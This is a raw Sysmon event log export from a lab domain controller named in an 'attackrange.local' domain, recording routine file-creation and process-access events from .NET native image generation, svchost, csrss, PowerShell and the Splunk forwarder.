23542300x800000000000000022717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.149{4DB9351A-A272-60D3-3805-00000000CF01}6792NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UC5YTL9VOT\Microsoft.Build.ni.dllMD5=70A51AAB19E052AB5118FF11B6A158BA,SHA256=25F20F2C0C832FAA700265428A938896F0B75A0C15CEB5572BDEB8DC25E0BEED,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.949{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D86B1A60E7E6014B59F17A56ABFE155A,SHA256=BB5FA3DFE6C6A08249C4FE6807F2F46473AE4F03F453A406CE43B8C95C376CC6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000022854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.793{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0de0gyld.bbm.ps12021-06-23 21:07:00.793 10341000x800000000000000022853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:00.761{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A274-60D3-4905-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.761{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:00.746{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A274-60D3-4905-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.746{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A274-60D3-4905-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 
23542300x800000000000000022849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.746{4DB9351A-A274-60D3-4805-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\40DHGI9GNG\Microsoft.GroupPolicy.Interop.ni.dll.auxMD5=D8E3258D361596F708E10D669366B353,SHA256=055036645E1F4DD7E91E4722FCD1D8259E1BA63B7851D0E5F02AF3804ADE23CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.746{4DB9351A-A274-60D3-4805-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\40DHGI9GNG\Microsoft.GroupPolicy.Interop.ni.dllMD5=FCE6632F7041F8668D2F10424D7E429B,SHA256=C12A9EA15A431F15209873E94A6971BFC3881B04EE9C9DEA9A6DE19A80BCCBB4,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.730{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A274-60D3-4805-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.714{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A274-60D3-4805-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.714{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A274-60D3-4805-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.714{4DB9351A-A274-60D3-4705-00000000CF01}6028NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\54Z0ODSLRJ\Microsoft.GroupPolicy.AdmTmplEditor.ni.dll.auxMD5=7FC131DB05B083463CC15B7CAB064EE9,SHA256=5A70988423CF022F8234458EEEDEBA8FE864D7E66CB3603366CB15422073FE70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.714{4DB9351A-A274-60D3-4705-00000000CF01}6028NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\54Z0ODSLRJ\Microsoft.GroupPolicy.AdmTmplEditor.ni.dllMD5=52B023CE28C92B401C5BE4EE51DBE348,SHA256=F1F3CC20B8AFA3A20DE446A5C66D0D75EE53E98B6E3DC257022D5B92D56E7AB3,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.683{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A274-60D3-4705-00000000CF01}6028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.683{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A274-60D3-4705-00000000CF01}6028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.683{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A274-60D3-4705-00000000CF01}6028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.668{4DB9351A-A274-60D3-4605-00000000CF01}6928NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RGRQ9UZQYN\Microsoft.Dtc.PowerShell.ni.dll.auxMD5=85C1F817ABEA81C6873B9CABBD03FE78,SHA256=14B972CAC10F57A51BF2CAC6FC072F6CC13941C9A6A9E705F4DF49893E577F09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.668{4DB9351A-A274-60D3-4605-00000000CF01}6928NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RGRQ9UZQYN\Microsoft.Dtc.PowerShell.ni.dllMD5=2DB05619A5CBE0F4DAB9952A4F57F993,SHA256=1EC879F7D253717035CE8C5263781982D55F255069F0B2C527038E82F9E54052,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.652{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A274-60D3-4605-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.652{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A274-60D3-4605-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.652{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A274-60D3-4605-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.636{4DB9351A-A274-60D3-4505-00000000CF01}6316NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0MCE3PICBG\Microsoft.CSharp.ni.dll.auxMD5=0B97B59E00AE0C2F725F37D2CD0789EA,SHA256=765466ECE0007E70BCDA5F1DD7B3ED67134BFD16973B9055B4D6CAC294777FA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.636{4DB9351A-A274-60D3-4505-00000000CF01}6316NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0MCE3PICBG\Microsoft.CSharp.ni.dllMD5=E11652503DBA109B76BB31B2F07E3BFD,SHA256=E12E8EA7480ADA2B69F2A5147FBA35E36B07983FB743B37486BF4A510AE9D23D,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.511{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A274-60D3-4505-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.465{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A274-60D3-4505-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.465{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A274-60D3-4505-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.465{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68A244F5BEAE086AF35B551CEAA0E6FF,SHA256=BAAA6EADB576899788425FB44772C74FEF4E2E5049F36FE87EA289D9C3EACB1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.449{4DB9351A-A273-60D3-4405-00000000CF01}1100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2YPPOGVZDQ\Microsoft.CertificateServices.Setup.Interop.ni.dll.auxMD5=D1A2FD108095856AF23C50A1555247D8,SHA256=3BA8CC2121082FE3E5507A32D12E11492D2D2F6A378876359674C8E276E1CEB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.449{4DB9351A-A273-60D3-4405-00000000CF01}1100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2YPPOGVZDQ\Microsoft.CertificateServices.Setup.Interop.ni.dllMD5=26239470E0E11EC9BB4DB79FA89CB904,SHA256=9FE9110DC1156D26A8261CBCC85DB5BDCB6E00D410A99EFF17364C257030349B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:00.340{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-4405-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 